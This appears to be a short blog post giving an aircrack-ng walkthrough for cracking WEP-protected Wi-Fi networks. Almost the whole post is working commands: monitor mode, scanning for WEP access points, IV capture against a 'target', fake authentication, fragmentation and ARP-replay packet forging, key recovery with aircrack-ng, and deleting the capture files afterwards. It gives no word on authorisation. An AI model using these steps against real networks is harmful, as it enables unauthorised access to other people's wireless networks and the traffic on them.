Run the following in the first terminal window to create an interface in monitor mode called mon0 of interface wlan0
The second command shows WEP encrypted networks nearby
The third command starts capturing traffic from your target

1
2
3
airmon-ng start wlan0 #create interface man0 in monitor mode of wlan0
airodump-ng --encrypt WEP mon0 #shows APs with WEP only
airodump-ng -c [channel] --bssid [mac_of_ap] --ivs -w [filename] mon0

Now open a second terminal and run the following
The first line associates you with the mac (see terminal window 1)
The second line looks for an IV that you can replay.
The third line creates a packet that you replay in the fourth line

1
2
3
4
aireplay-ng -1 0 -a [mac_of_ap] -h [mac_of_wificard] wlan0
aireplay-ng -5 -b [mac_of_ap] -h [mac_of_wificard] wlan0 #answer Y to prompt
packetforge-ng -0 -a [mac_of_ap] -h [mac_of_wificard] -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet wlan0
aireplay-ng -2 -r arp-packet wlan0 #answer Y to prompt

Watch those packets fly up in reminal window 1!!!!
Open a new terminal window and run the following to start cracking

1
aircrack-ng -n 128 -b [mac_of_ap] *.ivs

Remember to clean up your crap once you have finished

1
rm *.ivs *.cap *.xor

And to simplify this i’ve made a bash script, see the apps page.

Leave a Reply